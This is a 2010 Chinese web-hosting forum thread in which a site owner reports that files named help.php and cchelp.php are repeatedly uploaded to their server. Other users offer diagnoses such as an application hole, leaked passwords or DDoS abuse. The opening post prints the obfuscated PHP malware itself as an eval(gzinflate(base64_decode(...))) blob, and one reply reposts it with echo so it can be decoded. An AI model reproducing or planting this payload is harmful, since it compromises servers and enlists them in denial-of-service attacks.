找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 99|回复: 17

最近总是被上传help.php 这个文件是远程攻击

[复制链接]

17

主题

59

回帖

193

积分

注册会员

积分
193
发表于 2010-9-9 10:01:00 | 显示全部楼层 |阅读模式
请问有没有遇到的。被上传cchelp.php  和 help.php

删掉,又给上传,流量超高,这是哪方面的漏洞,请指教!

eval(gzinflate(base64_decode('DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLbVkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGYibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci13dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCwxiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOuSJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Awe8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnubV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3chsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));

内容就是这样,参考:http://hi.baidu.com/momoca/blog/ ... 03750e908f9d7e.html

请大家帮忙解决下。
回复

使用道具 举报

17

主题

78

回帖

223

积分

中级会员

积分
223
发表于 2010-9-9 10:04:47 | 显示全部楼层
程序漏洞吧
回复

使用道具 举报

72

主题

3945

回帖

8168

积分

论坛元老

积分
8168
发表于 2010-9-9 10:09:40 | 显示全部楼层
程序或者服务器有漏洞或者密码泄露了,多数是你在用的PHP程序的漏洞,我们也遇到不少这样的。。。
如果你不怎么用UDP的话可以封掉UDP包发送
回复

使用道具 举报

380

主题

3872

回帖

8948

积分

论坛元老

积分
8948
发表于 2010-9-9 10:10:34 | 显示全部楼层
检查下吧
回复

使用道具 举报

17

主题

545

回帖

1193

积分

金牌会员

积分
1193
发表于 2010-9-9 10:12:21 | 显示全部楼层
我也碰到过。
回复

使用道具 举报

4

主题

159

回帖

332

积分

中级会员

积分
332
发表于 2010-9-9 10:47:53 | 显示全部楼层








回复

使用道具 举报

17

主题

59

回帖

193

积分

注册会员

积分
193
 楼主| 发表于 2010-9-9 13:19:55 | 显示全部楼层
查日志,看第一个访问这个页面的IP是什么,再查这个IP之前访问过的页面分别是什么
回复

使用道具 举报

25

主题

1091

回帖

2269

积分

金牌会员

积分
2269
发表于 2010-9-9 13:26:27 | 显示全部楼层
漏洞吧echo(gzinflate(base64_decode('DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLbVkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGYibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci13dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCwxiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOuSJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Awe8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnubV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3chsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));

执行看看 看原代码 就知道是啥了。。。
回复

使用道具 举报

172

主题

1289

回帖

3134

积分

论坛元老

积分
3134
发表于 2010-9-9 13:31:06 | 显示全部楼层
被利用作DDOS攻擊...
回复

使用道具 举报

284

主题

4516

回帖

9940

积分

论坛元老

积分
9940
发表于 2010-9-9 13:31:36 | 显示全部楼层


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2025-1-13 13:14 , Processed in 0.022634 second(s), 5 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表